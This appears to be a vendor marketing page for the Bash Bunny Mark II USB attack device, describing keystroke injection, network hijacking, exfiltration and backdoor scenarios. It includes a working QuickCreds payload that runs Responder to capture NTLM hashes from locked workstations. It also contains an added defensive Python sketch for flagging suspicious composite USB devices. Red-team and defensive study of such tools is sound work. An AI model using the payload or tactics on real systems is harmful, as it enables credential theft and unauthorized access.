🐰

Bash Bunny

Mark II — USB Attack Platform

The world's most advanced USB attack platform. Simultaneously emulate trusted USB devices to deploy multi-vector payloads — from plug to pwn in 7 seconds.

MULTI-VECTOR USB | QUAD-CORE ARM | DUCKYSCRIPT™ | LINUX | BLUETOOTH | MICROSD
From Plug to Pwn in 7 Seconds

Computers inherently trust USB devices — keyboards, network adapters, flash drives, serial ports. The Bash Bunny exploits this trust by emulating combinations of these devices simultaneously, tricking targets into divulging data, exfiltrating documents, and installing backdoors. Under the hood it's a full-featured Linux computer with a quad-core CPU and desktop-class SSD. Flick the payload switch, plug it in, and when the LED turns green — the machine is compromised.

Multi-Vector USB Emulation

The Bash Bunny can emulate any of these trusted USB device types — alone or in powerful combinations.

HID: Keystroke injection via trusted keyboard emulation
ETHERNET: 2 Gbit adapter with DHCP — auto-trusted as primary network
STORAGE: Mass storage for exfiltration, binary injection & staged payloads
SERIAL: Dedicated serial console for root terminal access

Valid Combinations
HID + STORAGE: Inject keystrokes and drop or exfiltrate files simultaneously
HID + ETHERNET: Keystroke injection with full network stack for C2 callbacks
ETHERNET + STORAGE: Network hijacking combined with mass data exfiltration
ECM + RNDIS: Cross-platform Ethernet — Linux/Mac (ECM) & Windows (RNDIS)
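
For defenders, the combinations above translate into an endpoint check: flag any single USB device whose interface descriptors pair a keyboard, network adapter, or mass-storage function. The sketch below is an added example, not code from this page or the vendor; the class codes are standard USB interface class values, the sample devices are constructed, and which descriptors a particular device actually presents is an assumption.

```python
# Added example: constructed data, not vendor or page code.
HID, STORAGE, ETHERNET, SERIAL = "HID", "STORAGE", "ETHERNET", "SERIAL"

# Function pairs taken from the page's "Valid Combinations" list.
FLAGGED_PAIRS = [{HID, STORAGE}, {HID, ETHERNET}, {ETHERNET, STORAGE}]

# (class, subclass, protocol) triples commonly used by RNDIS adapters.
RNDIS_TRIPLES = {(0x02, 0x02, 0xFF), (0xE0, 0x01, 0x03), (0xEF, 0x04, 0x01)}


def classify(cls, sub, proto):
    """Map one interface descriptor triple to a device function, or None."""
    if cls == 0x03:                        # Human Interface Device
        return HID
    if cls == 0x08:                        # Mass Storage
        return STORAGE
    if cls == 0x02 and sub == 0x06:        # CDC Ethernet Control Model (ECM)
        return ETHERNET
    if (cls, sub, proto) in RNDIS_TRIPLES:
        return ETHERNET
    if cls == 0x02 and sub == 0x02:        # CDC Abstract Control Model (serial)
        return SERIAL
    return None                            # e.g. CDC data (0x0A), vendor-specific


def review_device(interfaces):
    """Return the functions one device exposes and any flagged pairings."""
    funcs = {f for f in (classify(*i) for i in interfaces) if f}
    alerts = [sorted(pair) for pair in FLAGGED_PAIRS if pair <= funcs]
    return {"functions": sorted(funcs), "alerts": alerts}


# Constructed sample descriptors (assumptions, not captures from real hardware).
SAMPLES = {
    "keyboard": [(0x03, 0x01, 0x01)],
    "flash_drive": [(0x08, 0x06, 0x50)],
    "keyboard_plus_rndis": [(0x03, 0x01, 0x01), (0xE0, 0x01, 0x03), (0x0A, 0x00, 0x00)],
    "ecm_plus_storage": [(0x02, 0x06, 0x00), (0x0A, 0x00, 0x00), (0x08, 0x06, 0x50)],
}

if __name__ == "__main__":
    for name, ifaces in SAMPLES.items():
        print(name, review_device(ifaces))
```

Legitimate composite devices, such as a phone offering tethering and storage, trip the same rule, so treat an alert as a triage signal and pair it with an allowlist of approved hardware.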
Specifications
Processor: Quad-core ARM CPU; boots in under 7 seconds
Storage: Desktop-class SSD (internal); MicroSD expansion slot
Memory: 512 MB RAM (doubled from Mark I)
Bluetooth: Remote triggers & geofencing; smartphone app control
Controls: 3-position payload switch; RGB LED status indicator
Operating System: Full Debian Linux; root shell via serial console
Interface: USB-A male connector; standard flash drive form factor
Network: 2 Gbit emulated Ethernet; ECM + RNDIS cross-platform
Plug → Switch → Pwn
STEP 01: Write Payload. DuckyScript text files — use Payload Studio or any editor
STEP 02: Load. Copy payload to Bash Bunny in arming mode — like a flash drive
STEP 03: Select. Flick the physical switch to assign payload position
STEP 04: Deploy. Plug in — green LED means mission complete
Key Features
▸ Multi-Vector Attacks — Combine HID, Ethernet, and storage emulation in a single payload. Exploit multiple trust vectors simultaneously.
▸ QuickCreds — Instantly harvest credentials by posing as the target's primary network adapter with an authoritative DHCP server.
▸ Wireless Geofencing — Prevent payloads from executing outside a designated geographic zone. Destroy loot if the device leaves the area.
▸ Remote Bluetooth Triggers — Activate payloads, trigger macros, and initiate exfiltration remotely via smartphone app or any BT device.
▸ Cross-Platform — Works on Windows, macOS, Linux, and Android. ECM and RNDIS Ethernet ensures universal compatibility.
▸ Community Payloads — Central git repository with a growing library of attacks. Download, customize, and deploy — or submit your own.
▸ MicroSD Exfiltration — Expandable storage for capturing gigabytes of loot. High-speed data transfer during active engagements.
▸ Payload Studio — Full-featured web-based IDE with syntax highlighting, auto-complete, live error checking, and repo sync.
QuickCreds — Credential Harvesting

Emulate a trusted Ethernet adapter, hijack network traffic, and harvest credentials in seconds — all while the target PC remains locked.

# QuickCreds — Bash Bunny Payload
# Harvests NTLM hashes via network hijack

ATTACKMODE RNDIS_ETHERNET

# Wait for network to be recognized
LED SETUP
REQUIRETOOL responder

# Launch Responder to capture hashes
LED ATTACK
RUN responder -I usb0 -wrFb

# Wait for credentials
WAIT_FOR_LOOT 60

# Cleanup and signal completion
LED FINISH
Deployment Scenarios
Credential Harvesting: QuickCreds grabs NTLM hashes from locked workstations in seconds via Responder and network hijacking.
Physical Red Team: Social engineer your way in, plug the Bunny into an unattended workstation, and exfiltrate documents before anyone notices.
Backdoor Installation: Combine HID and storage modes to inject and execute persistence payloads without user interaction.
Data Exfiltration: Silently copy target files to MicroSD storage while masquerading as a standard USB device.
IT Automation: Automate repetitive admin tasks — software deployment, configuration changes, inventory scripts — with a single plug-in.
Security Training: Demonstrate USB attack vectors in controlled environments. Show why USB policies and endpoint protection matter.